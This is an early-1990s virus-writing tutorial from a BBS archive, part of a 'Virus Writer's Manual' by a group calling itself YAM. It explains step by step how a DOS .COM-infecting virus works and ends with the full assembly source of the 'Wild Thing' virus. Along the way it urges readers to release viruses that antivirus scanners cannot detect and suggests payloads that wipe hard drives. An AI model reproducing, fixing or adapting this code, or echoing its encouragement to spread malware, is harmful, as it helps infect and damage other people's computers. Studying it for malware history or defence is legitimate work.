home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
The Unsorted BBS Collection
/
thegreatunsorted.tar
/
thegreatunsorted
/
texts
/
term_papers
/
yam-2.txt
< prev
next >
Wrap
Text File
|
1995-03-31
|
31KB
|
646 lines
_______ _______ __________ _____________________
\ | | / / __ \ \ /
| | | | | / \ | | |
*************| |_/ |*| \__/ |*| |*****************
*************| |*| |*| || || |*****************
**************\______ |*| __ |*| || || |*****************
*********************\ |*| || |*| |*\_/*| |*****************
________| | | || | | | | |
/ | | || | | | | |
/_____________/ /_______\\_____\ \____\ /______\
■ Youngsters Against McAfee ■
Present
Intro To .COM Infecting
Part II of an on going series of the
Totally Whacked Out Virus Writer's Manual
By Admiral Bailey [YAM]
______________
--| Disclaimer |------------------------------------------------------------
~~~~~~~~~~~~~~
I Nor Any member of YAM is not responsible in any way for any damage done
by this manual. Or anybody that reads this manual. There simple and small.
____________________
--| Copyright Notice |-(C)opyrite 1992--------------------------------------
~~~~~~~~~~~~~~~~~~~~
This thing is copyrighted by me. Do not change anything in it and release
it as your own. If you like it that's good. If you don't then do better.
If you caught releasing this as your own you will be dealt with accordingly.
I will make sure of this.
Now onto the good stuff... again!
________________
--| Introduction |-----------------------------------------------------------
~~~~~~~~~~~~~~~~
Imagine one day downloading VSum and looking through it only to find out
that your virus has made it in there. And it also having the line 'I don't
know what this virus does other then replicate' in the description. Boggling
McAfee and Patty all because you decided to write a simple virus that to them
is a pain in the ass. Well now your dreams can come true. In this part of
the TWOVWM (Totally Whacked out Virus Writer's Manual) i will be explaining
the process of .COM infecting in a very detailed manner. You may get bored
from all the reading that you have to do but you will know exactly how to
infect .COM files by the time you are done reading this. But before you read
this I recommend that you read the first Manual on overwriting virii. It has
most of the basic's and i will not repeat anything in that manual when it
comes to the coding time.
__________________________
| Why Am I Writing This? |
~~~~~~~~~~~~~~~~~~~~~~~~~~
I have never come upon anything that explains virii in detail. Explaining
why to do this and how to do this. By writing this I'm putting something out
into the world of virii that will contribute to better virii being made.
_________________________________
| What Type of Virus This Time? |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In this Manual I will be talking about how to write .COM infecting virii.
What are they? Basically they are virii that infect any file that fits the
criteria of '*.COM'. Its one of the 3 types of executable files. There are
Batch, .EXE (Explained in a later part), and .COM. Infecting .COM files is
the second easiest virus to write next to the over writer. What a .COM
infecting virus does is search the current drive for a .COM file and infect
it by altering the first jump (Explained later) so that instead of
immediately running the program the virus is run first and then control is
given back to the original file. The advantages of this type of virus is
that you can replicate on a system without the user finding out. You can
do many thing to make it harder for the person to figure it out. But I'll
save that for another part.
Basic Concept Of A .COM Infecting Virus:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
File Before Infected :
_________________________
| JP | Original Program |
~~~~~~~~~~~~~~~~~~~~~~~~~
─[- All the program does is jump to the program (Note JP-Jump Program) and
executes the program.
File After Infected :
______________________________________
| JV | Original Program | Virus | JP |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
─[- Before the program is run the program first jumps to the virus (Note JV -
Jump Virus) executes the virus and then jumps back to the original
program. (Note the JP)
_______________________
| What Will You Need? |
~~~~~~~~~~~~~~~~~~~~~~~
In order for you to create your first .COM infecting virus you will need as
usual:
■ TASM (Latest Version). Its the best!
■ Knowledge of assembly. Duh!? Whats Dat???
But other things I recommend are:
■ The first part of the TWOVWM. (Wow what a name.) It gets into
the basics of virii ect.
■ A good debugger. A lot of people like Turbo debugger but
personally I like debug because its quick and simple.
■ Ralph Browns Interrupt list. Its pretty big (1 meg). But it has
almost every interrupt that you can call on a computer and its
getting bigger. Even has some undocumented calls.
■ Any virus mag. I personally like NUKE's because it has a lot of
info in it. But Evolution is still on top. :)
■ Sourcer so you can get a commented source of other virii that you
have.
■ Evolution Mag. YAM's mag. A must have because of its articles
ect.. check it out for yourself.
_____________________
--| Let's Get Writing |------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~
Now since this is going get quite complicated for beginners I will first
illustrate what will be happening in your program by using a flow chart.
After that we will go through the process of actually infecting bit
by bit. The virus that I will use for this will be a variant of the Wild
Thing virus that I wrote. I'm not going give out the exact source because...
well because. And for all you K-Rad /<ool d00d's out there don't try to just
compile the source and distribute it because it's not going work. I'm going
purposely put error's in it to stop just any lamer from compiling it and
calling it their's. So don't try. All this one will do is infect all
.COM files in the current directory anyway's.
So first here is a flow chart of what the virus will do after this we will
get into the actual coding:
┌─────────────┐
┌──┤Jump to Virus│
│ └─────────────┘
│
│ Original Program Will Be Here
│
│ ┌─────────┐
├──┤Find file│
│ └──┬──────┘
│ │
│ ┌──┴──────┐ Nope ┌───────────────┐ ┌────────────────┐
│ │Any found├──────┤Display message├───┤Jump to original│
│ └──┬──────┘ └───────────────┘ │Program │
│ │ Yup └────────────────┘
│ ┌──┴────┐
│ │Open It│
│ └──┬────┘
│ │
│ ┌──┴───────────────────┐
│ │Read First Three Bytes│
│ └──┬───────────────────┘
│ │
│ ┌──┴────────────────┐
│ │Check For Infection│
│ └──┬────────────────┘
│ │
│ ┌──┴───────────┐ Yup
│ │Is it infected├─────────┐
│ └──┬───────────┘ │
│ │ Nope │
│ ┌──┴──────────────────┐ │
│ │Replace First 3 Bytes│ │
│ └──┬──────────────────┘ │
│ │ │
│ ┌──┴───────────────┐ │
│ │Write virus To end│ │
│ └──┬───────────────┘ │
│ │ │
│ ┌──┴───────┐ │
└──┤Close file├─────────────┘
└──────────┘
The flowchart is quite obvious. Just follow through it and you will get
the idea of how this type of virus will work. Now lets get into some
coding.
_________________
| What's First? |
~~~~~~~~~~~~~~~~~
The first thing you should have in you virus is a jump statement. Every
.COM file (Well every legit one) starts off with a jump statement. The
statement is located at 100h and tells the computer where to jump and start
at. All .COM file start at 100h where .exe files start at different areas.
(That's why you should have the org 100h statement at the top. You'll see
this later on in the virus source.) The jump should be coded using db
statements. Why well just to make sure there are 3 bytes at the top of your
virus so you can later replace them safely. A regular jump only uses two
bytes so when replacing it it can destroy your virus. After you have your
jump you must set up your pointer. (as i would like to call it.) It is
explained next.
_________________________________________________
| Pointer's The Most Important Thing In A Virus |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This may get complicated so try to follow. Basically a pointer is a
location that you keep in a register that points to the beginning of the
virus in an infected file. When a virus attaches itself to a file the
beginning of the virus is no longer at the beginning of the file. So now all
offsets are changed. For example :
Without The Pointer
~~~~~~~~~~~~~~~~~~~
Original virus:
100 jmp 103
103 mov ax,[500] ; put whats at location 500 in ax
... ; where in this case its ffffh
500 db 0ffffh
Virus After Infection:
100 jmp 900 ; now we jump to the virus first
103 ; from here to 900 is the original program
...
500 db 0340h ; here's where it asks for the info from and it could
... ; be anything
900 mov ax, [500] ; the beginning of the virus
... ; it asks for whats at location 500 but now its
1400 db 0ffffh ; different because its part of the original file.
; What it really wants is whats at location 1400h
; that's where the old 500 is now since it was tagged
; onto the end of the original file.
So as you can see all the offsets are changed. But with a pointer it will
fix this problem. Note the pointer is kept in the BP register. A register
we do not use a lot. In this case bp's value is 900. (The beginning of the
virus after the original program)
Virus After Infection:
100 jmp 900 ; jmp's automatically calculate themselves
103 ; from here to 900 is the original program
...
900 mov ax, [bp+500]; the beginning of the virus
... ; and since bp = 900 then 900+500=1400
1400 db 0ffffh ; which is right here and the value from the original
; file is at the new location and we found it.
If you don't understand what I was trying to say then keep reading this over
until you do because its very important. If you still stuck then read on and
you may understand it.
__________________________
| Setting up the Pointer |
~~~~~~~~~~~~~~~~~~~~~~~~~~
The first thing you should do when doing this is decide which register you
are going to hold the pointer in. When choosing one keep in mind not to
choose one of the ones that are used a lot. Mainly AX,BX,CX,DX. And you
can't use SP,IP. So you are stuck with using SI,DI,BP. SI and DI are going
to be used for other things in my example so I am going to use BP. But
remember what ever you use to hold the pointer make sure you never loose the
value in it. Now to set up the value you will have to use a call statement.
Why? Well when you execute a call it pushes the offset of where to return to
onto the stack. You can then pop this value off of the stack into your
chosen register. Then you would subtract the offset of the location that was
called and you would have your new pointer. An Example of this would be
something like:
call SetUpPointer
SetUpPointer:
pop bp
sub bp,offset setuppointer
Now your bp register holds the pointer. In the non-overwriting virus all
offsets where found by using the direct method. Now you must change these
ways to this:
Instead Of : Mov Ax,offset newjump
Do : Mov Ax,[Bp+offset newjump]
For register like DX you use the LEA statement instead of the mov statement.
This will probably be explained later on.
_______________________________
| Restoring The Original Jump |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Now that you have set up your pointer the first thing you should do is move
back the original jump to the beginning. There is nothing complicated about
this. All you have to do is put the location of the original 3 bytes in si
and 100h in di and then use a movsb and a movsw. Before you actually move
the bytes you should push di onto the stack. Why? Well when you set up the
pointer with the call statement you poped the return location off the stack
but you never replaced it. By pushing di on the stack (which now hold 100h)
to return to the original program all you have to do is do a ret and it will
return to 100h where the original jump now is and the program will then jump
to the original program. The code will look like below:
mov di,100h ; that's where all the original jumps are
lea si,[bp+offset oldjump] ; put location of old jump in si
push di ; put on stack for final return
movsw ; move a word and a byte (3bytes)
movsb
Now by moving the first three bytes back to the beginning of the file don't
think they stay there. They are only there in memory and will be gone after
the program is done. Don't worry about this because its not that important.
Oh and BTW for the first run virus the old jump you should set to int 20
which is 0cdh, 20h in hex and which halts execution of a .COM file.
______________________
| Before We Continue |
~~~~~~~~~~~~~~~~~~~~~~
Before we continue onto the infection process we could do a couple things.
First you could move the DTA (Explained in the first part). That was one of
the problems with the tiny virus. Any program that was infected with tiny
and required command line parameters would not run because any parameters
given on the command line were destroyed by the find first/next commands.
After moving the DTA you will have to find the first file which i will not
discuss because it was explained in the first part.
__________________
| Moving The DTA |
~~~~~~~~~~~~~~~~~~
Moving the DTA. In order to move the DTA you must set up a buffer where
the new DTA will be held. The DTA is 42 bytes long there for the buffer for
this is going to be 42 bytes big. If you want to keep your virus small the
best place to set up the DTA buffer is in the Heap (Explained Below). To
move the DTA use something like the code below :
lea dx,[bp+offset newDTAloc]; location to hold new dta
mov ah,1ah ; mov dta command
int 21h ; call dos
newdtaloc db 42 dup(?) ; set up the buffer for the dta
After setting up this new DTA you address everything in it by using the bp
and DTA offset. For example to get the file size do this:
mov bx,[bp+offset newDTAloc+1ah] ; gets file size
Now one thing you must not forget is to move the DTA back to its original
location when your virus is about to return control. To do this you follow
the same as the above but instead put 80h (the original location of the DTA)
into dx and your ready to return to the original program.
It will become more clearer later on.
___________________________
| Why LEA Instead Of MOV? |
~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Reason I suggest using LEA instead of MOV for registers that need
direct offsets of things is because LEA is quicker. LEA is smaller and LEA
will move the offset address into the destination operand instead of moving
the value that's held at that location. So this is the best command to use
for getting a location for something like the new DTA in a register. It is
mainly used for the DX register.
____________
| The Heap |
~~~~~~~~~~~~
The heap is an area in memory beyond the end of the file and before the
stack. Its not used for anything therefore we could use it to our advantage.
After the program everything in the heap gets destroyed. There for we can
only use the heap to hold temporary things. Like the DTA, the newjump ect.
Just as long as this stuff wont be needed by our virus when its run again.
__________________________
| Checking For Infection |
~~~~~~~~~~~~~~~~~~~~~~~~~~
Th easiest way to check a file for previous infection is to put the file
size in one register (say bx) out of the files DTA. Then get the location of
where the jump jumps to and put it in another register (say ax). Add the
size of the virus to ax and compare them. If ax=bx then the file is already
infected. It will make sense later if it doesn't already. If its already
infected then get another file. If not then continue on. A sample of this is
as follows:
The following gets the size of the file out of the DTA and puts it into the
ax register.
push bx ; save this because it hold the
; handle
mov bx,[bp+offset newdta+1ah]; put loc of size into bx
mov ax,[bx] ; put what bx points to into ax
pop bx ; get the handle back
Next we get the location of the jump add the virus size and compare it to
the file size (which is in the ax register).
mov cx,word ptr [bp+oldjump+1] ; get old jump loc
add cx,eof-virus+3 ; convert to size
cmp ax,cx ; compare
jz closefile ; if equal get another.
I must give credit to 40Hex for this method. I'm sure they didn't invent it
but it was from them that I learned to use this one. The one I used was
so stupid.
_________________________
| The Infection Process |
~~~~~~~~~~~~~~~~~~~~~~~~~
Now that you have found the first file you must infect it if its not
already infected. This part of this manual will be very lengthy so bear with
me.
First thing you should do is replace the first three bytes in the file
found. That way it will gie control to the virus first before the actual
program is executed. You do this step next because you can use the register
that had the file size in it from when you were testing for previous
infection. To do this (in my example the register is ax) subtract 3 from
the register (to subtract from the jump) and save it in an area that has
a 0e8h that is right before it. This is one of those things you can save
in the heap. For example.
sub ax,3 ; ax has file size
mov [bp+jumploc],ax ; save it for the write
jmpcom db 0e9h ; jmp ****:oooo the command
eof equ $ ; marks beginning of heap & end of file
jumploc dw ? ; where the location to jump to will be held
First you must set the file pointer to the beginning of the file.
Move File Pointer to beginning of file :
AH = 42h ; move file pointer command
AL = 00h ; to beginning of file
DX & CX must be empty ; use xor dx,dx and xor cx,cx
Now you write the new jump to the file by using the write to file command
which is explained in part one of the manuals. But instead put 3 in cx
(write three bytes) and in dx load the offset of jmpcom. It will write to
the beginning of the file and it will write jmp ****:oooo. So now the file
will first give control to your virus before executing itself. So now you
have put the actual virus code at the end of the file. So first you move the
file pointer to the end of the file. Its the same as moving the file pointer
to the beginning of the file but in AL you put 02.
Now you write the file to the end of the file. I'll give you an example of
how to do that :
mov ah,40h ; write to file command
mov cx,eof-virus ; number of bytes to write
; eof is the beginning of the heap
; virus is a marker right before the
; first call statement.
lea dx,[bp+offset virus] ; same as above but this is where to
; start writing from
int 21h ; call dos
There now that you've written the virus code to the end of the file you
just simply close the file (explained in part I) and go find another. After
you've found another you repeat all of the infection process.
______________________________________
| Returning Control To Original File |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Way at the beginning of the program you moved 3 bytes back to the beginning
of the file and you pushed a value of a 100h onto the stack. Now hoping that
you have not forgotten anything on the stack (by pushing something and not
popping or by calling a procedure and not returning ect..) all you will have
to do is issue a RET command and it will jump to location 100h and execute
the original program. And that's basically it to infecting a .COM file.
Check below for an example of all of what we discussed.
______________
| What Else? |
~~~~~~~~~~~~~~
.COM infectors can have endless capabilities. But that's where imagination
comes it. You can have it kill the hard drive on a certain day or time. Or
whatever. But its all up to you. Also don't forget to scan your virus before
releasing it. You don't want to release something you spent endless hours on
and it is scannable. Read 40 Hex issue (i forgot) on how to make your virus
unscannable if it happens to be scannable. Its one of the best E-Mags
dealing with virii and the like.
__________________
| Error Checking |
~~~~~~~~~~~~~~~~~~
This is very important to do. I already explained it in part one so I
suggest you read up on it. It could help your virus a lot.
______________
--| An Example |------------------------------------------------------------
~~~~~~~~~~~~~~
I have included below an example of a plain .COM infecting virus. It is
part of one of my first .COM infecting releases. I call it Wild Thing. Its
better then the tiny in the way it works and it heavily commented. So enjoy.
BTW there is an error or two in it to stop just any lamer from compiling it
and releasing it as your own. So to challenge all you beginners you have to
fix any errors in it.
;---
; Wild Thing Virus
;
; To Compile : TASM Wild /m ; Means use the multipass option
; Tlink wild /t ; Means turn it into a .COM file
;---------
code segment public 'code'
assume cs:code
org 100h ; all .COM files start at 100h
start:
db 0e9h ; jump to the virus loc
dw 0 ; in Debug is jmp 103
virus:
call realcode ; push ip on stack
realcode proc near
pop bp ; will pop ip into bp
lea si,[bp+offset oldjump] ; put the loc of orig jump in si
mov di,100h ; where to put the orig jump
push di ; for when we retn from the first
; call
movsw ; move two bytes
movsb ; move one byte
; Here you can do the moving of the DTA. I don't want to do all the work
mov ah,4eh ; findfirst command
lea dx,[bp+offset filespec] ; load loc of filespec in dx
xor cx,cx ; find normal attrib
findnext:
int 21h
jmp openfile ; if found file then open it
quit:
mov ah,09h ; display string
lea dx,[bp+offset messege] ; loc of string
int 21h
; if you moved the DTA before here is where you move it back
retn ; return to loc 100h
openfile:
mov ax,3d02h ; open file for read/write
mov dx,80h + 1eh ; get location of file name in dta
int 21h
jc findnext ; if error opening then get another
mov cx,3 ; read 1st 3 bytes
mov ah,3fh ; read file command
lea dx, [bp+offset oldjump] ; put location to hold the jump
int 21h ; read the file
jc closefile ; if error close up and find another
push bx ; save this on the stack
mov bx,80h+1ah ; put loc of of the file size into bx
mov ax,[bx] ; put the actual file size into ax
pop bx ; get original bx back off stack
;---
; Here we check for previous infection...
; Thanx go to 40hex-7 article for this method. Its easy and better than the
; ones I've used before.
;---------
mov cx,word ptr [bp+oldjump+1] ; get the location that the file
; jumps too
add cx,eof-virus+3 ; add the virus size to it
cmp ax,cx ; compare
jz closefile ; if equal its equal that means the
; file is infected and the jump jumps
; to the virus first
sub ax,3 ; calculate where the new jump will
; jump to by subtracting 3 (because
; of beginning jump) from the file
; size
mov word ptr [bp+jumploc],ax ; store new jump till later
; can also put this in the heap
mov ax,4200h ; move file pointer to the beginning
; of the file
xor cx,cx ; clear these
xor dx,dx ; or else pointer wont be set right
int 21h
mov ah,40h ; write to file command
mov cx,3 ; just first three bytes
lea dx,[bp+offset jumpcom] ; location of the new jump
int 21h ; do it.
mov ax,4202h ; set file pointer to the end of the
; file
xor cx,cx ; clear these
xor dx,dx ;
int 21h
mov ah,40h ; write the virus to the end
mov cx,eof-virus ; the program calculates the virus
; size itself and puts it into CX
lea dx,[bp+offset virus] ; where to start writing from
int 21h
closefile:
mov ah,3eh ; close file
int 21h
mov ah,4fh ; find next command
jmp short findnext ; find another file
realcode endp
messege db 'Wild Thing Virus',13,10,'$'
sig db 'Admiral Bailey [YAM] ',13,10,'$'
; the sig never gets displayed. Just there to let mcafee know who
; wrote the file
filespec db '*.com',0 ; type of files to find
oldjump db 0cdh, 020h, 0h ; to hold the old jump with jmp
jumpcom db 0e9h ; jump command
eof equ $ ; marks the end of the file and the beginning of the
; heap
jumploc dw ? ; holds the new jump
code ends
end start
_____________
--| Home Work |-------------------------------------------------------------
~~~~~~~~~~~~~
Well if you have to have some home work :) then here goes:
■ Have it cover its tracks by restoring attributes/date/time ect..
■ Have it move the DTA
■ Have it change directories.
All the above is somewhat advanced and will take time. But i will be
explaining it in the next part of this manual.
______________
--| Conclusion |------------------------------------------------------------
~~~~~~~~~~~~~~
Finally before I go just want to say that if you enjoy these let me know.
Heck if i get a response from you people I'll write more. But it does take
quite a bit of time. Others I may release are :
■ Extras You Can Add on to virii [attribs/date/time restoring ect.]
■ Encryption using the xor method
■ .EXE Infection
■ Different Ways Of Killing The Computer's HD ect...
■ Debug Killing techniques
Have fun coding...
Admiral Bailey [YAM]
** WOW!!! 644 Lines. Pretty long.
